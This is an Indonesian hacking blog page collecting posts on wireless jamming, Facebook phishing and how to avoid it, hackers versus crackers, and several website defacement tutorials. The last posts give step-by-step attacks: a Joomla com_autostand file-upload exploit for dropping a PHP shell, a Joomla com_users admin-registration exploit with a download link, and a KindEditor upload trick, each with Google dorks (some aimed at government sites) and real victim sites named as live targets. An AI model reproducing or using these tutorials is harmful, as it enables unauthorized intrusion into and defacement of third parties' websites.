Showing posts with label Deface And Hacking. Show all posts
Showing posts with label Deface And Hacking. Show all posts
In: , , , , , ,

Jamming ( DoS )

Jamming/Denial of Services Attack ( DoS ) Attack mudah untuk di terapkan ke dalam jaringan wireless. Jamming terjadi jika dapat frekuensi RF saingan yang dapat menganggu kerja dari  Wireless LAN. Jamming ini dapat terjadi baik itu disengaja maupun tidak sengaja . Jamming ini dapat terjadi baik itu di sengaja maupun tidak sengaja. Jamming yang tidak sengaja biasanya disebabkan oleh kehadiran alalt alat disekitanya seperti cordless phone, b;ueyooth, dl yang memiliki frekuensi kerja yang sama . Hal ini dapat dihindari oleh admin jaringan dengan menerapkan suatu aturan yang melarang keberadaan alat alat ini sehingga tidak menganggu kerja WLAN tersebut atau menggunakan alat yang lain dengan frekuensi operasi yang berbeda.

Jamming yang di sengaja oleh attacker biasanya dilakukan dengan membangkitkan satu frekuensi yang sama dengan frekuensi WLAN dengan daya ( power ) yang lebih besar daripada daya WLAN wksisting. Dengan demikian sistem WLAN seolah olah mendapatkan noise yang besar dari luar sehingga komunikasi antara AP dan CLient tidak bisa dilakukan (terputus) .Gambar di bawah mengilustrasikan bagaimana seorang Jammer dengan menggunakan HIgh Power RF Signal Generator melakukan Jamming.

Untuk melakukan hal ini, pemyerangan memerlukan  alat seperti PDA/Notebookyang telah dilengkapi Wireless card untuk mengacaukan trafik WLAN dan Spectrum Analyzer , untuk mementukan pada frekuensi berpakah jaringan tersebut bekerja .


Contoh contoh jamming yang mungkin terjadi yaitu :

  • Client Jamming :
    jamming pada sebuah client memungkinkan sebuah client "nakal" umtuk mengambil alih atau menirukan ungsi dari client yang sah. Selain itu, dengan melakukan jamming dapat merugikan client yang ingin mengakses jaringan atau menjalankan aplikasi secara remote

    Skema :
    USER - Jammer<>Attacker - Network Acces Point 
  • Base Station Jamming
    Jamming pada sebuah base station dapat mematukan fungsinya . Apabila hal ini dilakukan pada base station sebuah perusahaan telekomunikasi , maka dapat membawa kerugiandan kehilanagan pelayanan kepada pelanggannya.

    Skema :
    User - Attacker <> Jammer - Network Acces Point 


Share:
In:

Cara Hack Facebook ( Teknik Phising )

                   


               Buat Facebook'er semoga teknik ini bisa membawa manfaat  untuk menambah wawasan dan janganlah disalahgunakan . cara hack ini  sebenarnya menerupakan cara jadul  dilakukan para hacker namun boleh di bilang gampang gammpang susah , so rajin - rajinlah surfing di internet untuk menambah pengetahuan seputar Fake Login .

Share:
In:

Cara Menghindari Facebook Hacking

Hasil gambar untuk Facebook hack
           

            Facebook Hacking dulu sangat trend sekali dimana mana tiba tiba akun tidak bisa di akses dan lain lain namun sekarang perkembangan keamanan facebook sudah di perketat ya selalu ada kata " No System Is Safe". untuk itu teteplah behati hati dan mencegahnya , salah satu mencegah dari hack adalah selalu pastikan facebook anda login di url yang benar yaitu "http://www.facebook.com" . dan di bawah ini cara cara menghindari agar facebook kalian tidak terkena hack :

  • Jangan membuka link aneh karena mungkin saja link tersebut jebakan dari hacker
  • Bila sering online di warnet hindari kotak checkklist atau remember me saat login , kecuali anda gunakan komputer atau device pribadi
  • Gunakan Virtual Keyboard , untuk Windows klik Start > All Program ?> Accecoris > On Screen Keyboard
  • Berhati hati bila anda diminta login ulang mungin merupakan pe login yang sudah disiapkan oleh si hacker
  • Bak baik dan ramah kepada semua orang di dunia maya .
  • Gunakan Add ons Mozilla yang Anti Fake Login Seperti :
    PhishTank SiteChecker
        Berfungsi memblokir semua situs Phising Berdasarkan data dar komunitas PhishTank

    FirePhish
         Berfungsi memperingkatkan anda ketika mengunjungi situs yang di anggap situs phising

    TrustBar
          Berfungsi Memberikan Kemudahan paa user memberi logo  atau nama pada suatu situ yang di percaya oleh user tersebut

    SpooftStick
           Memberi informasi terhadap suatu situs

    CallingID link Advisor
            Berfungsi memverifikasi apakah link tersebut aman atau tidak  
Share:
In:

Perbedaan HACKER Dan CRACKER

            Hacker umumnya seorang profesional yang sangat ahli dala dunia hardware maupun software komputer , dengan didukung kemampuan seluk beluk sistem dan ilmu pemograman . Hacker bekerja sebagai penguji suatu sitem untuk menemukan titik lemah keamanan dan memperbaiki nya agar sistem tersebut dapat bekerja maksimal, dan tentu itu tiidak murah , itu salah satau orang ingin sekali menjadi Hacker .

            Sedangkan cracker hampir sama dengan hacker hanya saja dia tidak profsional karena memanfaatkan kemampuannya untuk merusak suatu sitem sofware maupun hardware untuk kepentingan pribadi , semisal membajak software berbayar menjadi gratis , atau mengacak data pribadi untuk menghasilkan uang .

            Dunia cyber ada juga yang menyebutnya dunia underground karena sulit mendeteksi dimana mereka berada dan selalu berpindah pindah dan sering mengunakan nama samaran dalam aksinya , selain itu misi yang di bawanya pun berbda beda ada yang hanya untuk kesenangan seperti bermain game online hingga untuk menghasilakn uang .

Bagaiman Mereka Bekerja ?


          Ada beberapa metode dalam melakukan Hacking dengan karakter yang berbeda beda tentunya , dibawah ini adalah beberapa teknik yang sering digunakan Hacker atau Cracker dalam beraksi . 

  1. Phising
    Tenik dengan mengirim email palsu atau link palsu untuk target yang di inginkan , apabila target mengklik link tersebut akan membuka sebuah website yang akan menanyakan user name dan password , atau didalam website tersebut langsung berisi backdoor untuk mengakses seluruh komputer si target .
  2. Trojan 
    Berfungsi sebagai penyusup untuk mendeteksi kelemahan atau celah yang dapat di manfaatkan si pelaku dalam mengakses jaringan tersebut . Cara kerjanya dengan bersembunyi dalam suatu software atau file yang akan bekerja jka software tersebut dijalankan dan secara otomatis trojan mengambil data lalu dikirimkan kepada Hacker atau cracker  , dan biasanya dalam kondisi terhubung ke internet ( Online )
  3. Keyloggers
    keylogger atau semacam software yang beguna untuk memantau kegiatan eyboard komputer , dengan cara merecord setiap tomb yang di tekan oleh user . Dapat juga dimanfaatkan untuk mereka yang telah berkeluarga guna memantau kegiatan anaknya karena keylogger akan merekam semua situs yang  di "search".
  4. SQL Injection
    SQL Injection adalah sebuah teknik hacking dimana seorang hacker dapat menginsert perintah perintah  SQL melalui url untuk dieksekusi oleh database.
  5. Denial Of Service
    Denial of service adalah sebuah jenis serangan ya g dilakukan di internet , yang memiliki tujuan guna pencegahan terhadap user untuk melakukan akses komputer atau jaringan tertentu. Serangan DOS mentargetkan bandwith dan koneksi sbuat jaringan untu dapat mencari misinya . serangan pembajiran traffic terhadapt bandwith dalam suatu jaringan , dengan memanfaatkan perangkat  yang sudah tersedia  pada jaringan itu sendiri, sehingga membuat user yang mengalami hilang koneksi dan membuatnya tidak dapat terkoneksi ke server kembali . 

Share:
In:

TOOL DDOS ..

Share:
In:

Deface Dengan Teknik Com_autustand di Joomla!

---English Tutorial----

Greetings All Defacer
Today wed like to share you how to input images into website.

########################################
Exploit Title:  joomla com_autostand file upload
########################################


Vendor or Software Link: forum.joomla.org


Google dork: "inurl:com_autostand"


  • Pick one of available target
  • localhost/path/index.php?option=com_autostand&func=newItem

If you found a shell can be upload with .php then you can directly upload them to the target.
like this :
localhost/path/images/autostand/images/yourshell.php

But in this case we found this site for an example :
http://www.ww.bakaara.com/

Then we can add the exploit : //index.php?option=com_autostand&func=newItem

and add after the main url it will be like this : http://www.ww.bakaara.com//index.php?option=com_autostand&func=newItem

Then you might upload the file you want to the target site.

Demo :
http://www.ww.bakaara.com/index.php?option=com_autostand&func=print&id=164&pop=1&tmpl=component

Live Target.
http://www.ww.bakaara.com/index.php?option=com_autostand&func=newItem

Dont Just Make Google Search engine !!


That's it. Good luck
Share:
In:

Deface Dengan Teknik Exploit Joomla | Com_User |

1. Download Exploit : jempolseru.hol.es/exploit.rar

2. Dork : intext:Joomla! is a flexible and powerful
platform, whether you are building a small site for yourself or a huge
site with hundreds of thousands of visitors site:com

dan juga mungkin dorknya bisa pake punya pak @console

Home Page Beez joomla 1.6
Home Page Beez2 joomla 1.6
Home Page Beez5 joomla 1.6
com_sefservicemap joomla 1.5
com_phocaguestbook joomla 1.5
com_phocagallery joomla 1.5
com_fireboard joomla 1.5
inurl:gov index.php/using-joomla/extensions/components/users-component/registration-form

Dorknya Kalian Edit atau Cari Dork Yang Lain..

3. contoh : http://cristorni.com.br/index.php?option=com_users&view=registration

4. ganti "index.php?option=com_users&view=registration" dengan exploit :                   "index.php?option=com_users&view=registration"

5. setelah masuk jangan langsung daftar :3 pencet CTRL + u atau klik kanan > view page source

6. cari tulisan "Hidden" nih ss-nya : http://prntscr.com/1nboe1
    pokonya code token semerawut

7. buka file tadi yg di download di notepad ganti email :    ganti email hpku100@yahoo.com jadi emailmu GANTI WEBSITE TARGET
   ="http://cristorni.com.br/index.php?option=com_users&view=registration"
    dengan yg kamu dapet

8. ganti user juga dengan yg kamu mau password biarin cari tulisan "hidden"
   ganti tulisan semerawut dengan yg dapatkan di site = CTRL + U
   jgn lupa di save

* kalo bingung apa aja yg diedit ini ssnya
   http://prntscr.com/1nbs3i
   http://prntscr.com/1nbsuk

9. buka exploit yg sudah kamu edit di mozilla atau semacamnya

10. register kalo ada tulisan merah tingal isi form password dengan yg kamu mau

11. buka email terus cari code registrasi .

12. BUKA HALAMAN admin contoh = http://cristorni.com.br/administrator

13. isi dengan user dan password yg kamu daftarkan

14. login dan selesai

tidak semua web bisa menggunakan teknik diatas,, kadang kita diarahkan ke register sebagai user login saja,,,tetep semangat cari web yg vuln

*Ada 4 kemungkinan GAGAL untuk web yang vuln:
1. Web telah menghapus laman Registration Form.
2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.
4. Template tidak bisa di di ubah.
5.Jangan Hanya menggunakan google search kalian juga bisa gunakan search engine yang lain (bing,Yahoo dll)

Baca Juga .
Cara Mengetahui Web Yang Vuln Com_user Atau Tidak!!
Share:
In:

Cara Mengetahui Web Yang Vuln Com_user Atau Tidak!!

Pada kali ini saya akan memberikan sebuah cara membedakan site vuln com_user  dan tidak vuln com_user

SITE VULN COM_USER = http://prntscr.com/1ytheu
Jika vuln tulisan ini berada agak keatas ...

SITE TIDAK VULN COM_USER = http://prntscr.com/1ytj9sJika tidak vuln tulisan ini berada agak kebawah ....

Dorknya :  [+] Joomla!® is free software released under the GNU General Public License.
Share:
In:

Jadi Defacer Cuma 3 Menit ? Tutorialnya Nih =)

Ingin Jadi Defacer dalam 3 Menit ?

Buka www.google.com

copy dork ini ==> inurl:examples/uploadbutton.html

Lalu search ..

akan muncul banyak web, pilih aja salah satu

contoh =>

http://www.fkcasings.com/kindeditor/examples/uploadbutton.html

di sana ada kolom buat file upload, Klik Tombol upload , kemudian upload script html yang sudah disiapkan.

Setelah itu copy semua tulisan yang ada di box upload .
contoh :
/kindeditor/attached/file/20131105/20131105175109_47435.html

kemudian copy link tersebut dan pastekan dibelakang url.com

contoh =>
http://www.fkcasings.com/

menjadi

http://www.fkcasings.com/kindeditor/attached/file/20131105/20131105175109_47435.html

udah deh cuman butuh waktu 3 menit dah berasa jadi defacer dah .

Share: